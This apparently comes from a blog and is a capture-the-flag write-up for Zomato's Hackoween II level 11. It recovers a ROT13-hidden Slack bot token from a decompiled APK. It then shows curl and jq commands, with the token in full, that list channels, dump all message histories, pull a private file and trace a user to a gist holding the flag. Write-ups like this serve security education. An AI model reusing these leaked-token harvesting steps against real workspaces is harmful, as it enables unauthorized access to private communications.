Level 11 – Hackoween II #ZomatoCTF

Insert ChatGPT code? No level is called – Instant Gratification

This level gave an apk and form to submit the code.

Download and decompile the apk file. I use JADX-GUI.

There is a leaked Slack API token.

It is ROT13 as the code suggests.

Back to CyberChef to get the ROT13 value of token.

Used this token to get all channels.

curl "https://slack.com/api/conversations.list" -H 'Authorization:
Bearer xoxb-5729419145606-5750052480419-NCuEloorjXP8vW3AWyprQWRb' -o channels.json

Too many channels. Now get all the messages in all channels.

cat channels.json | jq '.channels[].id' | xargs -I {} -P 10 curl "https://slack.com/api/conversations.history?channel={}&pretty=1" -H 'Authorization: Bearer xoxb-5729419145606-5750052480419-NCuEloorjXP8vW3AWyprQWRb' -o channel-chat-{}.json

Explained this shell

A lot of messages by bots U05N6PBAFEJ. Let’s filter that out

cat channel-chat-* | jq '.messages[]|select(.user != "U05N6PBAFEJ")' > all.json

all.json have all the messages by members of that Slack workspace and the have shared some files.

But the hint is in flag_txt.txt

curl -H 'Authorization: Bearer xoxb-5729419145606-5750052480419-NCuEloorjXP8vW3AWyprQWRb' https://files.slack.com/files-pri/T05MFCB49HU-F0

Who shared this file? User U05ND262075

Using Slack API, found out the username udhaya.prakash. Found his GitHub and Gist and got access to the gist mentioned in flag_txt.txt


Ran the javascript code in Gist and found the flag XNYTH&6GjgSj7Z

Submitted it in the form and got the flag.

Leave a Reply

Your email address will not be published. Required fields are marked *